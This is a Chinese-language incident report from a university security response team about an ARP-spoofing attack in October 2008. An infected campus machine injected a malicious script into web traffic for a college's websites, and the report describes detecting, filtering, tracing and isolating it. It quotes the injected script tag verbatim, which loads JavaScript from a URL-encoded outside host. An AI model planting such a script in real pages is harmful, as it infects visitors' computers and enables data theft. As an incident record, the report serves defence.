在2008年10月8日下午至10月9日期间, 由于受ARP欺骗影响, 院外网络访问H学院2个网站时都会被自动加上一段恶意代码, 从而连接到“挂马”的恶意网站, 并使H学院网络质量也受影响。
2008年10月8日16::40分, CSIRT通过帮助台接到我校H学院网管反映, 称在学院内部直接访问自己的网站正常, 而经过代理服务器访问就会发现被加恶意代码(俗称“挂马”)。
经过分析, 初步认定是H学院网段内至少有一台计算机在实施ARP欺骗攻击, 假冒网关, 劫持客户端到H学院网站服务器的http通信流量(网页代码), 并把篡改过的网页代码返回给客户端, 导致学院外访问这两个网站的计算机有可能感染病毒、木马。 被篡改过的网页代码头部含有以下一段恶意代码:
<script language=javascript src=http://%77%2E%63%39%39%64%2E%63%6E/lg.js></script>
H学院内网络质量也受影响, 向外的网络通讯不稳定, 并也会在http通信流量(网页代码)插入上述代码, 学院内的计算机如补丁防范不足, 就会感染病毒、木马, 导致敏感信息失窃事件。
CSIRT将事件定位后, 一方面从DNS服务器和核心路由器层面对上述校外挂马网站进行过滤, 一方面通知学院网管尽快找出发起ARP欺骗攻击的傀儡机器。 由于这种攻击的不定时性及与H学院网管沟通上出现了困难, 致使ARP欺骗的影响持续1天半。 在CSIRT赶赴现场并一再与H学院网管交流后, 安装必要的软件进行监测, 才于10月10日9时16分把攻击机器准确定位到该学院的M教授使用的工作用机上。 经隔离调查确认此机已感染木马, 可进行ARP欺骗攻击, 盗取信息。 通过后续几天的监测发现, 未再有新的ARP攻击机器出现, 访问H学院网站被嵌恶意代码现象也已消除。
CSIRT是专门调查、处理校园网计算机安全事件小组, 用户有需要, 会进行适当的响应, 但是CSIRT在工作时也需要用户给予恰当的配合和信赖。 CSIRT推广的监测和防范ARP欺骗攻击的方案, 是经历过本科教学水平评估、招生录取现场、数字迎新等实战考验而行之有效的方案。
